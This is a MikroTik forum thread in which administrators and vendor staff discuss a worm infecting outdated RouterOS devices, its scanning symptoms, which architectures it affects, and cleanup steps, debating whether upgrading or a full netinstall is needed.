Community discussions

 
User avatar
macgaiver
Forum Guru
Forum Guru
Posts: 1717
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: RouterOS making unaccounted outbound winbox connections

Tue Mar 27, 2018 12:54 pm

@macgaiver
Isn't your proposal going hand-in-hand with the new sex trafficking law :-) ? https://www.wired.com/story/how-a-contr ... e-the-web/
I'm on the other side of the World, in here torrents and other file sharing is still at large, so some if not most responsibility is taken by customer when he signs the agreement.
With great knowledge comes great responsibility, because of ability to recognize id... incompetent people much faster.
 
Filip92
just joined
Posts: 5
Joined: Fri Dec 30, 2016 6:28 pm

Re: RouterOS making unaccounted outbound winbox connections

Tue Mar 27, 2018 5:33 pm

I noticed a log entry on SXT5Lite (RouterOS v 6.34.2, 6.34.4, 6.37.1)
Mar/26/2018 23:45:13   memory      info             created new share: pub
Mar/26/2018 23:45:15   memory      info             fetch: file ".i" downloaded
and then router starts syn sent flood dstport 23 and 8291...... connections count about 900-2000...

Upgrade to ver 6.39.1 fix this... Bad new's - most of our clients have version between 6.34.2 and 6.37.1 :(
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24077
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: RouterOS making unaccounted outbound winbox connections

Tue Mar 27, 2018 5:36 pm

Definitely try to upgrade, otherwise this thing can spread and make your problems even worse.
No answer to your question? How to write posts
 
blazej44800
newbie
Posts: 31
Joined: Thu Feb 20, 2014 6:16 pm

Re: RouterOS making unaccounted outbound winbox connections

Wed Mar 28, 2018 12:40 am

@normis
I've just discovered two devices, one is RB SXT 5HnD with ROS 6.41.3, upgraded from older version after infection. Both continue to scan for telnet, upgrading didn't solve problem. Just generating suppout, await for it on support.
 
User avatar
strods
MikroTik Support
MikroTik Support
Posts: 1406
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: RouterOS making unaccounted outbound winbox connections

Wed Mar 28, 2018 7:35 am

blazej44800 - We received such e-mail (I assume that it was you) and upgrade had already resolved the problem. However, also local RouterOS devices running old software were already infected. After an upgrade on those devices problem must be resolved right away.

You can check this by running Tool/Torch on your device - here you can clearly see that traffic comes from local IP addresses and then check if this source IP is a router running an old RouterOS version.

At the moment we are not aware about any single case when upgrade would not resolve the issue.
 
User avatar
macgaiver
Forum Guru
Forum Guru
Posts: 1717
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: RouterOS making unaccounted outbound winbox connections

Thu Mar 29, 2018 5:26 pm

So far my testing show that only mipsbe devices are getting exploited. Anyone notice other architectures affected?

Also all of the devices actually required reboot to get the exploit part going, from what i read here i had idea that everything will happen straight away...
With great knowledge comes great responsibility, because of ability to recognize id... incompetent people much faster.
 
User avatar
NathanA
Forum Veteran
Forum Veteran
Topic Author
Posts: 793
Joined: Tue Aug 03, 2004 9:01 am

Re: RouterOS making unaccounted outbound winbox connections

Thu Mar 29, 2018 10:49 pm

So far my testing show that only mipsbe devices are getting exploited. Anyone notice other architectures affected?
I haven't, though fully-fleshed example exploits of this vulnerability were released for both mipsbe and x86 earlier this month, and Hajime supports mipsbe, x86, and arm, so it is at least *likely* that an x86 version exists but that there simply aren't enough x86 ROS boxes out there for it to spread at the same rate. If the author simply lifted the exploits from the examples that were released, then that means it's unlikely that arm, powerpc, or tile are being infected, both because it would require some additional/original work on the author's part for arm support and also because AFAIK Hajime doesn't even have binaries for powerpc or tile at this time.
Also all of the devices actually required reboot to get the exploit part going, from what i read here i had idea that everything will happen straight away...
I'm not sure if it executes straight away or only does so after a reboot. As I implied in a prior post, I have been able, as a test, to copy the Hajime loader onto a clean device and run it manually, and it will start up and run; however it will not install the rc.d (startup) script itself, so whatever host is pushing the Hajime loader onto the device is also pushing the rc.d script onto it. If you only put the actual Hajime binary onto a device and run it, it will not automatically start up after reboot.

It's possible that the host pushing the infection is 1) copying Hajime binary to device, 2) copying Hajime rc.d script to device, and then 3) issuing reboot command to device, starting it that way. There is no reason why it would have to issue reboot, though, instead of just start up the Hajime process straight away.

-- Nathan
 
User avatar
k6ccc
Member
Member
Posts: 465
Joined: Fri May 13, 2016 12:01 am
Location: Glendora, CA, USA (near Los Angeles)

Re: RouterOS making unaccounted outbound winbox connections

Sat Mar 31, 2018 1:42 am

I use a non-standard port for all the ways into the router (including WinBox) - in addition to other things for security. I have a firewall rule that drops traffic bound for the standard ports for www, ftp, ssh, & WinBox. The real purpose of those rules is to give me packet counts since they would be dropped later anyway. Sure enough, I have been getting quite a few hits on the "normal" WinBox port 8591...
Made sure all three routers were up to date too (they were all pretty close)...
RB750Gr3, RB750r2, CRS326-24G-2S (in SwitchOS), CSS326-24G-2S, CSS106-5G-1S, RB260GS
Not sure if I beat them in submission, or they beat me into submission


Jim
 
rllavona13
just joined
Posts: 7
Joined: Mon Nov 28, 2016 12:41 am

Re: RouterOS making unaccounted outbound winbox connections

Fri Jun 22, 2018 10:29 pm

We have the same problem, i noticed the problem is in versions before 6.37, i was able to resolve this problem upgrading the RouterOS to 6.42.1 and upgrading the firmware. No need to fresh install anything just upgrade to the last version and the problem is fixe. There's a worm infecting RouterOS and i guess Mikrotik doesn't know or just ignore the problem
rllavona
Jr Network Engineer
 
pe1chl
Forum Guru
Forum Guru
Posts: 5563
Joined: Mon Jun 08, 2015 12:09 pm

Re: RouterOS making unaccounted outbound winbox connections

Fri Jun 22, 2018 10:51 pm

There's a worm infecting RouterOS and i guess Mikrotik doesn't know or just ignore the problem
It is actually YOU who doesn't know you had to update...
When you had been on the mailing list or forum, you would have known about this for months.
It is better to keep your devices uptodate so you are less likely to be affected by problems like this.
And of course configure your firewall correctly so the admin interface is not available from the internet.
 
anav
Forum Guru
Forum Guru
Posts: 2904
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: RouterOS making unaccounted outbound winbox connections

Sat Aug 11, 2018 3:27 pm

We have the same problem, i noticed the problem is in versions before 6.37, i was able to resolve this problem upgrading the RouterOS to 6.42.1 and upgrading the firmware. No need to fresh install anything just upgrade to the last version and the problem is fixe. There's a worm infecting RouterOS and i guess Mikrotik doesn't know or just ignore the problem
What?
First of all, depending upon the state and depth of the compromise a wipe and fresh install may be required. In other words one cannot generalize your fix as a panacea for eveyone elses issues.
The vulnerability of the Mikrotik Router in past OS's and via Winbox have been well documented and patched by Mikrotik so I would say you are ill informed regarding their work. Logically speaking why would they ignore the problem as it makes no sense from a technical, security or business perspective. As an purported engineer in your signa, do you really think the engineers at Mikrotik would have such an approach?? From my reading most of the issues were NOT actually POSSIBLE unless the person administering the router was incompetent (at least from a security point of view).
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
carl0s
Frequent Visitor
Frequent Visitor
Posts: 65
Joined: Thu Jun 25, 2009 7:18 pm

Re: RouterOS making unaccounted outbound winbox connections

Wed Sep 19, 2018 12:11 am

Just check in System -> Schedule.
There will be a schedule to run a script every minute that continues to allow the hackers in.
Remove the script from System -> scripts too.
SOCKS proxy has probably been enabled. turn that off.
check there are no new users added under System -> users
change the password of the existing user.
kill the existing connections from the IP -> firewall -> connections table.
Also check for NAT rules.

obviously if possible restrict Winbox access too.

oh, and yeah, upgrade routerOS to a version that doesn't allow the whole internet to pull down the username & password table :D
 
davzar
just joined
Posts: 8
Joined: Tue Aug 09, 2016 11:20 am

Re: RouterOS making unaccounted outbound winbox connections

Wed Sep 19, 2018 12:37 pm

Another important check is:

check if you have static entrien on IP/DNS/Static

i found DNS A Record and CNAME to fake mikrotik download site

maybe for download an altered version of routeros
 
carl0s
Frequent Visitor
Frequent Visitor
Posts: 65
Joined: Thu Jun 25, 2009 7:18 pm

Re: RouterOS making unaccounted outbound winbox connections

Thu Sep 20, 2018 2:16 am

Another important check is:

check if you have static entrien on IP/DNS/Static

i found DNS A Record and CNAME to fake mikrotik download site

maybe for download an altered version of routeros
That's a really interesting one. I hadn't thought to check that!
 
anav
Forum Guru
Forum Guru
Posts: 2904
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: RouterOS making unaccounted outbound winbox connections

Sun Mar 03, 2019 11:52 pm

Just check in System -> Schedule.
There will be a schedule to run a script every minute that continues to allow the hackers in.
Remove the script from System -> scripts too.
SOCKS proxy has probably been enabled. turn that off.
check there are no new users added under System -> users
change the password of the existing user.
kill the existing connections from the IP -> firewall -> connections table.
Also check for NAT rules.

obviously if possible restrict Winbox access too.

oh, and yeah, upgrade routerOS to a version that doesn't allow the whole internet to pull down the username & password table :D
Wrong wrong wrong. You cannot remove this sheite by simple means.
Stop, dont check anything, dont waste your time...........
The only approved method once infected/hacked is to use netinstall with a fresh install of the latest firmware and start from scratch.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)

Who is online

Users browsing this forum: Bing [Bot] and 72 guests